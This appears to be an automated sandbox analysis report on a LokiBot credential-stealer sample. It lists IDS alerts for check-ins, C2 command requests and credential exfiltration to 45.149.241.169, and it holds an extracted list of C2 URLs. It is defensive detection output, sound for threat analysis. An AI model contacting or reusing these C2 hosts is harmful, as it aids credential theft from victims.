                    2024-10-03T09:22:33.340490+020028257661Malware Command and Control Activity Detected192.168.2.116443745.149.241.16980TCP
                    2024-10-03T09:22:34.448158+020028257661Malware Command and Control Activity Detected192.168.2.116443845.149.241.16980TCP
                    2024-10-03T09:22:35.225001+020028257661Malware Command and Control Activity Detected192.168.2.116443945.149.241.16980TCP
                    2024-10-03T09:22:36.015476+020028257661Malware Command and Control Activity Detected192.168.2.116444045.149.241.16980TCP
                    2024-10-03T09:22:36.917140+020028257661Malware Command and Control Activity Detected192.168.2.116444145.149.241.16980TCP
                    2024-10-03T09:22:37.931400+020028257661Malware Command and Control Activity Detected192.168.2.116444245.149.241.16980TCP
                    2024-10-03T09:22:38.836712+020028257661Malware Command and Control Activity Detected192.168.2.116444345.149.241.16980TCP
                    2024-10-03T09:22:39.681925+020028257661Malware Command and Control Activity Detected192.168.2.116444445.149.241.16980TCP
                    2024-10-03T09:22:40.614660+020028257661Malware Command and Control Activity Detected192.168.2.116444545.149.241.16980TCP
                    2024-10-03T09:22:41.558183+020028257661Malware Command and Control Activity Detected192.168.2.116444645.149.241.16980TCP
                    2024-10-03T09:22:42.344416+020028257661Malware Command and Control Activity Detected192.168.2.116444745.149.241.16980TCP
                    2024-10-03T09:22:43.251789+020028257661Malware Command and Control Activity Detected192.168.2.116444845.149.241.16980TCP
                    2024-10-03T09:22:44.067474+020028257661Malware Command and Control Activity Detected192.168.2.116444945.149.241.16980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\Desktop\mjtjewi.exeJoe Sandbox ML: detected
                    Source: Comprobante.lnk.lnkJoe Sandbox ML: detected
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49710 version: TLS 1.2

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64389 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64389 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64389 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64384 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64384 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64384 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64387 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64379 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64389 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64389 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49711 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49711 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49711 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64357 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64357 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64357 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64387 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64387 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64375 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64375 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64375 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.11:49711 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64379 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64379 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64357 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64357 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64387 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64387 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64375 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64379 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64375 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64379 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64384 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64389
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64384 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64354 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64354 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64354 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64384
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64391 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64391 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64391 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64354 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64354 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64391 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64354
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64391 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64379
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64350 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64350 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64350 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64391
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64410 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64410 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64410 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64403 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64402 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64350 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64402 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64350 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64402 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64404 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64404 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64350
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64404 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64352 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64363 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64363 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64361 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64387
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49715 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64402 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64376 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64358 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64376 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64402 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64404 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64410 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64404 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64407 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64407 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64407 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64368 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49718 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64367 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49718 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49718 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64362 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64402
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64398 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64398 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64398 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64376 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64410 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64416 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64398 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64398 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64408 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64403 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64407 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64407 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64365 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64395 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64424 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64365 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64404
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64420 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64395 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64420 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64420 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64395 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49714 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49714 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49714 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64376 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64376 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64420 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49714 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64420 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64422 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64395 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64395 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64365 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49718 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64372 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64422 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64372 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64364 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64372 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64364 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64364 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64395
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64398
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64416 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64372 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64408 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64422 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64364 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64408 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64364 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:55843 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:55843 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:55843 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64422 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64422 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64367 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64408 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:55843 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64409 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64424 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64409 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64422
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49712 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64367 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49712 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49712 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64442 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64442 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64442 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.11:49712 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64396 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64407
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64363 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64367 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:55843 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64367 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64420
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64400 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64400 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64400 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64400 -> 45.149.241.169:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64423 -> 45.149.241.169:80
